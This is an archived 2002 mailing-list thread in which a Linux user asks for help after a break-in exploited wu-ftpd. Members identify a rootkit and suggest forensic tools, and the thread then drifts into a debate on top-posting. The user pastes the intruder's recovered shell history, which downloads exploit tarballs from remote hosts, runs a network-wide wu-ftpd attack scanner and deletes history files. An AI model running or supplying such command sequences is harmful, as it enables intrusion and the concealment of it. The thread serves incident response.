Hello,
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also other from the outside world cant access my PC), so there are warning messages by my automatic IP updater from 6:24 onwards. What I am amazed is that after an entry at 2:22am there is an entry at 6:24, so someone has definately hacked and deleted the middle section, he probably left the upper part just to misguide us.
The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there,
cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas*
After that is what I had been doing. So that is the last entry.
So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do not thing it is necessary. There are a few other things that amaze me here are
1. First is the time 2:22am to 6:24am is free where as there should have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. The error given by netstat -a is
bash# netstat -a sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.net: Too many open files in system
bash# ps ax sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.pstmp: Too many open files in system cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory
top is working fine but does not show me any problems
4. wget was downloading mandrake for me, it should have got disconnected since my net wasnt working, but it is still continuing to download the ISO's for me. Also another amazing thing is that wget was downloading 2nd ISO when I logged in and just downloaded 114MB of it and switchedover to 3rd ISO.
INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.
Please help me to find the person who did this. Thanks in advance.
Bye.
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
there r tools available for crackers to clean up logs after break in .... might b possible that ur *cracker* also run some kinda tool to remove logs
cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz
this is a rootkit..... to check with which rootkit was installed on ur machine visit
. netstat -a, ps ax are not working since
These files r replaced with trojaned ones by rootkit ... so there is possibility that they show u wrong results or malfunction ...
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet
ranjeet@nttindia.com mailto:ranjeet@nttindia.com wrote:
Please help me to find the person who did this. Thanks in advance.
forensic analysis .....
regards Ranjeet
One of the best available toolkits for forensic analysis is the coroners toolkit.
chk out http://www.porcupine.org/forensics/tct.html I hope it helps.
---> Vinayak Hegde
On Mon, 18 Nov 2002 mails@munshi.dyndns.org wrote:
Well, I have been hacked and my /var/log/messages has next to nothing
Ok, well first of all, I request that you don't say hacked when you really mean cracked. It's not nice to insult the people who's help you're asking for.
in it. I am keen on getting to this person who did it. Fortunely I
/var/log/messages will have been cleared up by the cracker, but unless you have backups, I don't think you can get that back.
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Is something missing at the end of the above line? It looks like you've used pico to view the file and the mouse to copy paste. I'd suggest making a copy of /var/log/messages and editing that, and then copy the lines as it is into your mail.
Also, who did the userdel for ftp? Was it you or do you suspect the cracker to have done this?
The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also
Do you know why this happens? If not, how long has this been happening? It is possible that you might have had a trojan on your system for quite some time. In that case, unless you have logs from right back then, it will be hard to find out what's happening.
The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there,
cd /dev/ida/.sys/trojan
^^^^^^^^^^^^ how long ha this been there?
wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz
this is a wu-ftpd exploit script. You really, really, really shouldn't be running wu-ftpd, but, too late now.
My guess is that you're wu-ftpd also had anonymous ftp enabled, which is all that's required to get into your system.
Now, the thing about autowu is that it automatically scans a network block and attacks all hosts with port 21 open. Looking at my logs shows many such scans. You might want to look at /var/log/secure - if you have it.
cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas*
After that is what I had been doing. So that is the last entry.
Is this your .bash_history or root's? Check root's bash_history as well.
So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do
have you disconnected from the network? At this moment you could be scanning other people.
not thing it is necessary. There are a few other things that amaze me here are
- First is the time 2:22am to 6:24am is free where as there should
have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. The error given by netstat -a is
bash# netstat -a sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.net: Too many open files in system
/root/.net?
Please run chkrootkit on your system.
you seem to still have some trojaned software around.
INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.
ftp was running! that's the main problem.
It's very hard to figure out who's done this without more logging information. look at /var/log/loginlog, /var/log/secure, /var/log/wtmp
Chances are the cracker missed those files.
Philip
Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created by the hacker. Regards lilo
--- mails@munshi.dyndns.org wrote: > Hello,
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also other from the outside world cant access my PC), so there are warning messages by my automatic IP updater from 6:24 onwards. What I am amazed is that after an entry at 2:22am there is an entry at 6:24, so someone has definately hacked and deleted the middle section, he probably left the upper part just to misguide us.
The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there,
cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas*
After that is what I had been doing. So that is the last entry.
So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do not thing it is necessary. There are a few other things that amaze me here are
- First is the time 2:22am to 6:24am is free where
as there should have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. The error given by netstat -a is
bash# netstat -a sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.net: Too many open files in system
bash# ps ax sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.pstmp: Too many open files in system cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory
top is working fine but does not show me any problems
- wget was downloading mandrake for me, it should
have got disconnected since my net wasnt working, but it is still continuing to download the ISO's for me. Also another amazing thing is that wget was downloading 2nd ISO when I logged in and just downloaded 114MB of it and switchedover to 3rd ISO.
INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.
Please help me to find the person who did this. Thanks in advance.
Bye.
________________________________________________________________________ Missed your favourite TV serial last night? Try the new, Yahoo! TV. visit http://in.tv.yahoo.com
On Mon, 18 Nov 2002, liloindia wrote:
Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created
[snip]
1. don't top post 2. don't include the entire original post in your reply.
Philip S Tellis <philip(at)konark.ncst.ernet.in> writes:
On Mon, 18 Nov 2002, liloindia wrote:
Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created
[snip]
- don't top post
Even though top posting is a very irritating thing most of the times, it is OK somethimes. e.g. when what you have to say is related to the Subject but not to the matter in the post i.e. when you dont /need/ to quote the OP. But I entirely agree with you on the matter of snipping off unnecessary material in the posts.
- don't include the entire original post in your reply.
quasi
On 18 Nov 2002, q u a s i wrote:
Even though top posting is a very irritating thing most of the times, it is OK somethimes. e.g. when what you have to say is related to the Subject but not to the matter in the post i.e. when you dont /need/ to quote the OP. But I entirely agree with you on the matter of snipping
Well, if you don't need to quote the OP, then don't quote him at all. Putting the OP at the bottom makes it hard for people to reply to your reply. If someone needs to address points brought up by both you and the OP, he'd need to have everything in context, in the correct order. These things are well documented in the usenet posting faq IIRC.
Philip
Philip S Tellis <philip(at)konark.ncst.ernet.in> writes:
On 18 Nov 2002, q u a s i wrote:
quote the OP. But I entirely agree with you on the matter of snipping
Well, if you don't need to quote the OP, then don't quote him at all.
Which is what I meant when I talked about snipping. Just leaving a line or two at the bottom to give context is allright but generally people dont even trim unnecessary signatures...
quasi
correct order. These things are well documented in the usenet posting faq IIRC.
right.
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc just to ensure that I donot miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that every thing i say is read, no possibilty of anyone missing part of my posting.
Regards Saswata
----- Original Message ----- From: "Philip S Tellis" philip@konark.ncst.ernet.in To: linuxers@mm.ilug-bom.org.in Sent: Wednesday, November 20, 2002 10:26 AM Subject: Re: [ILUG-BOM] Hack
On 18 Nov 2002, q u a s i wrote:
Even though top posting is a very irritating thing most of the times, it is OK somethimes. e.g. when what you have to say is related to the Subject but not to the matter in the post i.e. when you dont /need/ to quote the OP. But I entirely agree with you on the matter of snipping
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc just to ensure that I donot miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that every thing i say is read, no possibilty of anyone missing part of my posting.
I am however in favour of posting in middle, since it simplifies the life of the people want to help. We dont have to mentions about what we are replying. For example in my other post (proFTP ...) I have asked 2 questions, if I were answering it then I would prefer to answer the two questions under each of those topics. If I am writting to my friends and relatives I too prefer top posting since we already know what we are mentioning.
Regards Saswata
----- Original Message ----- From: "Philip S Tellis" philip@konark.ncst.ernet.in To: linuxers@mm.ilug-bom.org.in Sent: Wednesday, November 20, 2002 10:26 AM Subject: Re: [ILUG-BOM] Hack
On 18 Nov 2002, q u a s i wrote:
Even though top posting is a very irritating thing most of the times, it is OK somethimes. e.g. when what you have to say is related to the Subject but not to the matter in the post i.e. when you dont /need/ to quote the OP. But I entirely agree with you on the matter of snipping
On Fri, 22 Nov 2002, Amish Munshi wrote:
If I am writting to my friends and relatives I too prefer top posting since we already know what we are mentioning.
agreed, top posting (or no quoting at all) is perfectly ok on one-to-one conversations - since both parties already know the entire conversation and there is no risk of messages arriving out of order.
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote: I am fully in favour of top posting.
[snip]
Amish Munshi writes:
I am however in favour of posting in middle, since it simplifies
[snip]
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
************** Vinayak Hegde APGDST Student NCST-Juhu **************
On Sat, Nov 23, 2002 at 06:18:40AM -0700, vinayak_hegde@softhome.net wrote:
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
Very sorry to say I disagree with you. Top posting makes a mail looks bad and some times may increase the mail size also. It is always better to trim the unwanted portions. Bandwidth charges are too high in India.
Better read http://www.tuxedo.org/~esr/faqs/smart-questions.html
Regards
Dileep M. Kumar wrote:
On Sat, Nov 23, 2002 at 06:18:40AM -0700, vinayak_hegde@softhome.net wrote:
top/middle/bottom posting does not matter as long as relevant portions are quoted and the person requesting help gets helped :))
Top posting makes a mail looks bad and some times may increase the mail
size also. It is always better to trim the unwanted portions.
what i indirectly meant by quoting relevant portions is that unwanted portions should be snipped. I hope that clears the air about my response to the quoting/ posting thread.
Vinayak Hegde
On Fri, Nov 22, 2002 at 10:04:50PM +0530, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most
of you
Top posting is BAD in mailing lists. If you cannot avoid using MS OE try quotefix from http://jump.to/oe-quotefix .
Regards
On Fri, Nov 22, 2002 at 10:04:50PM +0530, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc just to ensure that I donot miss out some reply embedded in the middle of a long thread. Top posting (like this), on the other hand, ensures that every thing i say is read, no possibilty of anyone missing part of my posting.
Time for my favourite search on the net! :-)
http://www.google.com/search?q=quoting+strategies+comp.lang.perl.misc
Read the first link that comes up ...
http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/4372
Also this is a good read ...
http://www.faqs.org/rfcs/rfc1855.html
Sameer.
On Fri, 22 Nov 2002, Saswata Banerjee & Associates wrote:
I am fully in favour of top posting. The current way in which most of you reply makes me have to go through the entire quoted mail, all older mails, links, etc just to ensure that I donot miss out some
Well the problem is that most people do not trim the OP to cut out irrelevant portions, so you end up getting the entire thread, while all that is required is just some snips from previous posts.
In general, original content posted should make up more than 70-80% of the message.
Interleaving your reply with the original post allows one who enters the thread late (or who receives mails out of order (which is extremely common on usenet, but also on mailing lists)) can read the thread in a conversational manner, ie, A - reply_to_A - B - reply_to_B - reply_to_reply_to_B - etc.
Quoting strategies are really a `use all or abuse it' kind of system.
Maybe I'll forward Tom Christianssen's message from clpm.
Philip
PS: Anybody play Jeopardy?
On Mon, 18 Nov 2002 09:24:13 -0500 mails@munshi.dyndns.org wrote:
Please help me to find the person who did this. Thanks in advance.
[snip]
cmon dear grow up, this is the internet and all kinds of creatureslurk in the alleys and bylanes.
You should use this as a step towards hardening your boxen/servers. Finding out why your system got cracked is a fair enough question, but asking for who did it dude is a bit too much......
Don't you agree with me...:)
Bye for now.
Trevor
Bye.
Please help me to find the person who did this. Thanks in advance.
[snip]
cmon dear grow up, this is the internet and all kinds of creatureslurk in the alleys and bylanes.
haha Trevor I agree.
Just as a tip... messages like I have this and this running... can't get it configured... what do I do; make footprinting even easier. After all, all your messages are universally available. One must always refrain from putting in stuff of this sort for critical systems at least.
Maybe the guys on the list from MBT,TCS and others should take a note of this.
Warm regards,
Amol Hatwar.
-
Amish Munshi -
Amol Hatwar -
Dileep M. Kumar -
liloindia -
mails@munshi.dyndns.org
-
Philip S Tellis -
q u a s i -
ranjeet@nttindia.com -
Sameer D. Sahasrabuddhe -
Saswata Banerjee & Associates -
Trevor Warren -
Vinayak Hegde -
vinayak_hegde@softhome.net